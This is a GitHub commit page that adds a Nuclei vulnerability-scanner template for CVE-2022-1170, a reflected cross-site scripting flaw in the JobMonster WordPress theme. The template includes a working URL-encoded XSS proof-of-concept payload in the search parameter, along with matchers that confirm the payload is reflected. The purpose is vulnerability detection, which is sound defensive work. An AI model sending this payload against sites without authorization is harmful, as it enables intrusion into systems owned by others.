Skip to content

Commit

Permalink
Merge pull request #8633 from projectdiscovery/CVE-2022-1170
Browse files Browse the repository at this point in the history
Create CVE-2022-1170.yaml
  • Loading branch information
pussycat0x authored Nov 16, 2023
2 parents 11234cb + ad7e292 commit 1459279
Showing 1 changed file with 44 additions and 0 deletions.
44 changes: 44 additions & 0 deletions http/cves/2022/CVE-2022-1170.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
id: CVE-2022-1170

info:
name: JobMonster < 4.5.2.9 - Cross-Site Scripting
author: Akincibor,ritikchaddha
severity: medium
description: |
In the theme JobMonster < 4.5.2.9 there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.
reference:
- https://wpscan.com/vulnerability/2ecb18e6-b575-4a20-bd31-94d24f1d1efc
- https://nvd.nist.gov/vuln/detail/CVE-2022-1170
classification:
cve-id: CVE-2022-1170
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/themes/noo-jobmonster"
tags: cve,cve2022,wp,wp-theme,wordpress,xss,jobmonster

http:
- method: GET
path:
- '{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E'

matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>'
- 'noo-resume'
condition: and

- type: word
part: header
words:
- "text/html"

- type: status
status:
- 200

0 comments on commit 1459279

Please sign in to comment.